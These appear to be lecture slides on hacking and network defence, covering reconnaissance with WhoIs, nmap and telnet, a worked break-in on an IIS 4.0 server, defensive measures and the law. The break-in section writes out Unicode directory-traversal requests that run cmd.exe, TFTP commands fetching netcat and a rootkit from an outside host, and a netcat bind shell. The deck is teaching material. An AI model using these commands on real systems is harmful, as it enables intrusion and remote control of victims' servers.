Internet Security & Hacking

Download Report

Transcript Internet Security & Hacking 

Software Security & Hacking
Dan Guerndt
[email protected]
Outline









Types of Hackers
The Hacker you don’t want to be against
Information needed by a Hacker
Tools needed by a Hacker
WhoIs Databases
Social Engineering
Example of Breaking Into a System
Defensive Measures
How the Law deals with Hacking
Introduction
 Why learn how to hack?
– Best offense is the best defense
– Become a Hacker to learn what they need and
use
– Use hacking to find entry points into your own
system
 Defensive measures to be taken against
attackers
Types of Hackers
 Three tier pyramid
– Cream of the crop
 IQ’s that boil water
 Can write scripts and tools
 Can find vulnerabilities
– IT Savvy
– Script “Kiddies”
 Easiest to get caught
 Fires off scripts/programs until something works
 All of them are very dangerous
Typical Hacker you don’t want to be
against
 Unlimited Patience
– Sometimes it can take a long time to crack a system
– Wait for the administrator to backup system





Planned Attack
Extensive Research
Doesn’t take easy approaches (traps)
Social Engineer
Only uses the most stealthy approaches
Information needed by a Hacker







Domain Name
IP Address
Operating System & Version Number
Open Ports
Knowledge of IDS/Firewalls
Vulnerabilities
System Admin’s Name/Contact
Tools needed by a Hacker
 WhoIs Databases
 Port Scanning Program(s)
– NetCat – Swiss Army Knife
– Nmap
– Nslookup
 RootKit
 Vulnerability Databases or extreme
knowledge
WhoIs Databases
Types of Queries
 Registrar – Attacker must find the correct Registrar
-http://www.internic.net/whois.html
 Domain – Gets Domain Name, Admin Contact,
DNS server info
 Network – Gets specific network blocks that
organization owns – Http://www.arin.net
 Point of Contact – Search ARIN using email
address from Domain Query – will sometimes
provide more domains that attacker did not know
about
Social Engineering





Attacker acts like he/she belongs
“I LOVE YOU” virus
Attacker that goes to HQ
Interview Example
Women
Breaking into a System: Step 1
 Find webpage of Target
 Do a port scan on the Targets Webpage
– Nmap, Netcat, Nslookup
– Nslookup web site
 http://www.kloth.net/services/nslookup.php
– Gives IP Address
Breaking Into a System: Step 2




Need the rest of the target networks IP address range
ARIN Database Search – gives every IP
Nmap – gives only IP’s with open ports
One time ACK/SYN
–
–
–
–
–
–
–
–
–
–
–
$ nmap –sP 208.37.215.0/24
Interesting ports on [208.37.215.233]
[The 1529 ports scanned but not shown below are in state: closed]
Port
State
Service
21/tcp
open
ftp
22/tcp
open
ssn
23/tcp
open
telnet
79/tcp
open
finger
80/tcp
open
http
143/tcp
open
imap2
Nmap run completed – 256 IP addresses [1 host up| scanned in 360 seconds]
Breaking into a System: Step 3
 Don’t want to use Nmap for OS guessing
 Use Telnet instead
 Most web servers are designed to provide
their HTTP version and operating system
Step 3 (Continued)
 $ telent 208.37.215.233 80
 Trying 208.37.215.233…
 Connected to 208.37.215.233.
 Escape character is ‘^].
 HEAD / HTTP/1.0
 HTTP/1.1 200 OK
 Server: Microsoft-IIS/4.0
 Date: Fri, 16 Feb 2001 18:45:23 GMT
 Context-Length:526
 Context-Type: text/html
 Connection closed by foreign host.
Now have to find vulnerabilities for Windows NT 4.0 and IIS
Breaking Into a System: Step 4
 As a rule of thumb, the latest vulnerabilities
are often the least defended against
 After finding vulnerabilities, attacker will
exploit them
 This example uses a Unicode bug
Step 4 (Continued)
 $ telnet 208.37.215.233 80
 Trying 208.37.215.233…
 Connected to 208.37.215.233.
 Escape character is ‘^]’.
 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>
 +test.msg
 HTTP/1.1 200 OK
 Server: Microsoft-IIS/4.0
 Date: Fri, 16 Feb 2001 19:20:32 GMT
 Content-Length: 0
 Content-Type: text/plain
 Connection closed by foreign host.
Seems to have worked – No error, must double check
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg
 This GET displays the file created above
– We now have the ability to read and write on the server
Breaking Into a System: Step 5
 Attacker must download 2 Programs onto the
target system
– RootKit
– NetCat – to open our own ports
 Since Windows NT does not support passive FTP,
the attacker must use TFTP (Trivial File Transfer
Protocol)
 GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tft
p+-i+216.240.45.60+GET+nc.exe
Step 5 (Continued)
 Download NetCat
– GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c
+tftp+-i+216.240.45.60+GET+”NetCat”.exe
 Download RootKit
– GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c
+tftp+-i+216.240.45.60+GET+’RootKit’.exe
Step 5 (Continued)
 Attacker must issue a Netcat command to
bind a port for the attackers use
– GET
/scripts/.%c1%9c../winnt/system32/cmd.exe?/c+
nc.exe-1+-p+100+-t+-e+cmd.exe
– Binds attacker a port on Port 100 (must use a
port not currently in use on the target system)
Step 5 (Continued)
 $ telnet 208.37.215.233 100
 Trying 208.37.215.233.
 Connected to 208.37.215.233.
 Escape character is ‘^].
 C:\winnt\system32\>
Now have System access and the attacker
runs the Rootkit
Defending against Hackers
Patch (#1 Defense)
– Check for updates daily
– Vendors should correct mistakes quickly
– Be aware of Vulnerabilities not protected
– If attacker cannot find a vulnerability on the
Internet, the attacker would have to find out a
new unknown vulnerability not yet released to
the public
Defending (Continued)
 Firewall
– The less open ports the better
– Less vulnerability targets
 IDS (intrusion detection system)
– Finds abnormal traffic, but usually does not stop
– Sets a flag
– Very hard for attackers to detect
– Works internally and externally
– Can be completely passive
Defending (Continued)
 Do not release incriminating information
– Watch what is on WhoIs Databases
– Be careful what info is released on company
websites
– Attackers will often give up if the info cannot be
found
– Be careful what is shown at the company site
 Servers should not be publicly shown
 No toy penguins!
Defending (Continued)
 70% of all attacks are done by employees
– If an employee leaves and puts in malicious
code before leaving, he/she may have a
backdoor
 Full Audit!
 Time and Money
– All code must be documented properly
– Model diagrams also help to compare with
written code
Defending (Continued)
 Set up a trap
– Leave open an obvious easy entry point
– Do not use the entry point at all
– Flag every occurrence of its use
Law and Hacking
 Conviction often considered as a Felony
 Good luck getting an IT job with a hacking
conviction!
 Fines and time spent in jail depends on
damage done
– 5+ years
– $250,000 fine
Test your might!
 www.hackthissite.org
Conclusion





All types of attackers are dangerous
Attackers need info & tools
Exposed server information should be hidden
Anything is penetrable, no matter how secure
Be weary of disgruntled employees and social
engineering ploys
 Patch frequently
References
 [1] Ahmad, David R. Mirza.; Russel, Ryan. Hack Proofing
Your Network. Rockland: Syngress Publishing, Inc. 2002.
 [2] McClure, Stuart; Scambray, Joel; Kurtz, George.
Hacking Explosed: Network Security Secrets & Solutions.
Fourth Edition. Berkeley: Nordin. 2003.
 [3] Hack Proofing Your Web Applications: The Only Way to
Stop a Hacker is to Think Like One. Rockland: Syngress
Publishing, Inc., 2001.
 [4] Chirillo, John. Hack Attacks Testing: How to Conduct
Your Own Security Audit. Indianapolis: John Wiely & Sons,
Inc. 2003.